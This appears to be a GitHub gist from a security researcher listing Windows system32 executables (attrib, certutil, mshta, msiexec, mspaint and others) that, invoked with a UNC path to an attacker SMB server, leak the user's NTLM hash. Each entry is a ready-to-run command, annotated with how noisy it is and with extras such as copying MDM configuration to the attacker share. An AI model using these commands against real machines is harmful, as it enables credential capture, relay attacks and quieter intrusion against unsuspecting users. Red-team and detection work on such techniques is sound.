Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Executables for Capturing Hashes (incomplete list)
(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)
@0rbz_
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share (noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share (noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share (this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share (noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share (noisy, pops an error dialog)
fvenotify.exe \\host\share (noisy, pops an access denied error)
FXSCOVER.exe \\host\share (noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share (noisy, will pop an explorer window with the contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share (sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share (noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share (noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share (noisy, invalid path to png error)
mspaint.exe \\host\share\share.png (will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share (noisy, error)
mstsc.exe \\host\share (noisy, error)
netcfg.exe -l \\host\share -c p -i foo
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment